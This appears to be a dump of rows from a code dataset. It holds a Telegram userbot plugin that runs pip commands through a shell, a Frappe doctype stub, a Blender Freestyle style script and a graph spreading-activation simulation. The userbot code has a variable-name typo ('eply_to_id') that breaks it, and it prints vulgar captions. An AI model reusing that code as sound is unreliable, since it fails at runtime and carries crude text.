process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Sex Installed To Pornhub**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="telegram"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install telegram"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , Telegram Installed To Pornhub**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="listpip"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip list"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , PIP Installed To Your Pornhub...**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="pyfiglet"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install pyfiglet"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , PIP Installed To Your Pornhub...**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
@borg.on(admin_cmd(pattern="kowsay"))
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
# dirname = event.pattern_match.group(1)
# tempdir = "localdir"
cmd = "pip install cowsay"
# if dirname == tempdir:
eply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
start_time = time.time() + PROCESS_RUN_TIME
process = await asyncio.create_subprocess_shell(
cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
OUTPUT = f"**[Ravana's](tg://need_update_for_some_feature/) , PIP Installed To Your Pornhub...**\n"
stdout, stderr = await process.communicate()
if len(stdout) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(stdout)) as out_file:
out_file.name = "exec.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption=OUTPUT,
reply_to=reply_to_id
)
await event.delete()
if stderr.decode():
await event.edit(f"**{stderr.decode()}**")
return
await event.edit(f"{OUTPUT}`{stdout.decode()}`")
# else:
# await event.edit("Unknown Command")
| [
"noreply@github.com"
] | noreply@github.com |
249309d3c41e03e3fe9f734f5c7be424511e3763 | 5f81bff4ccd6920b448d2165854e928c7efda9f5 | /movements/movements/doctype/payment_location/payment_location.py | cc7fe470791bd8124ef15eb493d76239203a89e9 | [
"MIT"
] | permissive | hshamallakh/movements | d77897263ead77ffc1cc6e89f935abe2e0c15b2e | 3087497390f470d9da667ae918d86807b4d6bbff | refs/heads/master | 2021-05-04T00:40:08.225206 | 2018-02-05T16:59:58 | 2018-02-05T16:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018, Ahmed Ragheb and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class PaymentLocation(Document):
pass
| [
"ubuntu@ip-172-31-83-45.ec2.internal"
] | ubuntu@ip-172-31-83-45.ec2.internal |
d7919c38e0ac4b378ccf1771060a7670a3744ca6 | ece0d321e48f182832252b23db1df0c21b78f20c | /engine/2.80/scripts/freestyle/styles/apriori_density.py | 1de2c4c033457e302c229c3c7014b55c0b8010d7 | [
"GPL-3.0-only",
"Font-exception-2.0",
"GPL-3.0-or-later",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain-disclaimer",
"Bitstream-Vera",
"LicenseRef-scancode-blender-2010",
"LGPL-2.1-or-later",
"GPL-2.0-or-lat... | permissive | byteinc/Phasor | 47d4e48a52fa562dfa1a2dbe493f8ec9e94625b9 | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | refs/heads/master | 2022-10-25T17:05:01.585032 | 2019-03-16T19:24:22 | 2019-03-16T19:24:22 | 175,723,233 | 3 | 1 | Unlicense | 2022-10-21T07:02:37 | 2019-03-15T00:58:08 | Python | UTF-8 | Python | false | false | 1,743 | py | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Filename : apriori_density.py
# Author : Stephane Grabli
# Date : 04/08/2005
# Purpose : Draws lines having a high a prior density
from freestyle.chainingiterators import ChainPredicateIterator
from freestyle.predicates import (
AndUP1D,
NotUP1D,
QuantitativeInvisibilityUP1D,
TrueBP1D,
TrueUP1D,
pyHighViewMapDensityUP1D,
)
from freestyle.shaders import (
ConstantColorShader,
ConstantThicknessShader,
)
from freestyle.types import Operators
Operators.select(AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.1,5)))
bpred = TrueBP1D()
upred = AndUP1D(QuantitativeInvisibilityUP1D(0), pyHighViewMapDensityUP1D(0.0007,5))
Operators.bidirectional_chain(ChainPredicateIterator(upred, bpred), NotUP1D(QuantitativeInvisibilityUP1D(0)))
shaders_list = [
ConstantThicknessShader(2),
ConstantColorShader(0.0, 0.0, 0.0, 1.0)
]
Operators.create(TrueUP1D(), shaders_list)
| [
"admin@irradiate.net"
] | admin@irradiate.net |
9d95173045444ddceac7aaebc34b8f75adf12995 | fff26da96c4b324cdbc0315c3fdf1fe2ccbf6bf0 | /.history/test_celegans_corrected_weights_20210615130634.py | a875acee9236154c606750101651e4d37fd22fd9 | [] | no_license | izzortsi/spreading-activation-networks | ebcd38477a4d4c6139a82b0dd7da3d79a0e3f741 | f2cf0bf519af746f148fa7a4ea4d78d16ba6af87 | refs/heads/dev | 2023-06-28T03:49:34.265268 | 2021-06-15T18:07:51 | 2021-06-15T18:07:51 | 376,718,907 | 0 | 0 | null | 2021-06-15T18:07:51 | 2021-06-14T06:01:52 | Python | UTF-8 | Python | false | false | 3,390 | py | # %%
import graph_tool.all as gt
import numpy as np
import numpy.random as npr
# import matplotlib.colors as mplc
from matplotlib import cm
import matplotlib.colors as mplc
import os, sys
from gi.repository import Gtk, Gdk, GdkPixbuf, GObject, GLib
from plot_functions import *
# %%
def init_elegans_net():
g = gt.collection.data["celegansneural"]
g.ep.weight = g.new_ep("double")
norm_eweights = minmax(g.ep.value.a)
g.ep.weight.a = norm_eweights
del g.ep["value"]
del g.gp["description"]
del g.gp["readme"]
del g.vp["label"]
g.vp.state = g.new_vertex_property("int")
g.vp.activation = g.new_vertex_property("float")
n_vertices = g.num_vertices()
n_edges = g.num_edges()
activations = npr.normal(size=n_vertices)
activations = minmax(activations)
g.vp.state.a = np.full(n_vertices, 0)
g.vp.activation.a = activations
return g
# %%
def init_graph(g):
treemap = gt.min_spanning_tree(g)
gmst = gt.GraphView(g, efilt=treemap)
gtclos = gt.transitive_closure(gmst)
return {"g": g, "gmst": gmst, "gtc": gtclos}
def minmax(a):
a = (a - np.min(a))
return a/np.max(a)
# %%
"""
def set_graph(type="gtc")
type being either the original graph "g", the MST of it
"gmst" or the transitive closure of the MST "gtc". Defaults
to "gtc".
"""
def set_graph(type="gtc"):
g = init_elegans_net()
graphs = init_graph(g)
g = graphs["g"]
gmst = graphs["gmst"]
gtc = graphs["gtc"]
return g, gmst, gtc
# %%
# %%
####DYNAMICS PARAMETERS
SPIKE_THRESHOLD = 0.90
POTENTIAL_LOSS = 0.8
MAX_COUNT = 600
#OFFSCREEN = True
OFFSCREEN = sys.argv[1] == "offscreen" if len(sys.argv) > 1 else False
# %%
g, gmst, gtc = set_graph()
# %%
g = gmst
# %%
set(list(map(tuple, gtc.get_all_edges(151))))
# %%
count = 0
# %%
def update_state():
global count, g
spiker_activation = np.max(g.vp.activation.a)
spiker = gt.find_vertex(g, g.vp.activation, spiker_activation)[0]
nbs = g.get_out_neighbors(spiker)
nbsize = len(nbs)
if nbsize != 0:
spread_val = spiker_activation/nbsize
for nb in nbs:
w = g.ep.weight[g.edge(spiker, nb)]
g.vp.activation[nb] += spread_val*w
g.vp.activation[spiker] -= spread_val*w
else:
if g.vp.activation[spiker] >= 1:
pass
#if g.vp.activation[nb] >= SPIKE_THRESHOLD:
win.graph.regenerate_surface()
win.graph.queue_draw()
if OFFSCREEN:
pixbuf = win.get_pixbuf()
pixbuf.savev(r'./frames/san%06d.png' % count, 'png', [], [])
count += 1
if count >= MAX_COUNT:
sys.exit(0)
return True
# %%
pos = gt.sfdp_layout(g)
PLOT_PARAMS = plot_params(g, None)
if OFFSCREEN and not os.path.exists("./frames"):
os.mkdir("./frames")
# This creates a GTK+ window with the initial graph layout
if not OFFSCREEN:
win = gt.GraphWindow(g,
pos,
geometry=(720, 720),
vertex_shape="circle",
**PLOT_PARAMS,
)
else:
win = Gtk.OffscreenWindow()
win.set_default_size(720, 720)
win.graph = gt.GraphWidget(g,
pos,
vertex_shape="circle",
**PLOT_PARAMS,
)
win.add(win.graph)
# %%
cid = GLib.idle_add(update_state)
win.connect("delete_event", Gtk.main_quit)
win.show_all()
Gtk.main()
# %%
# %%
| [
"istrozzi@matematica.ufrj.br"
] | istrozzi@matematica.ufrj.br |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.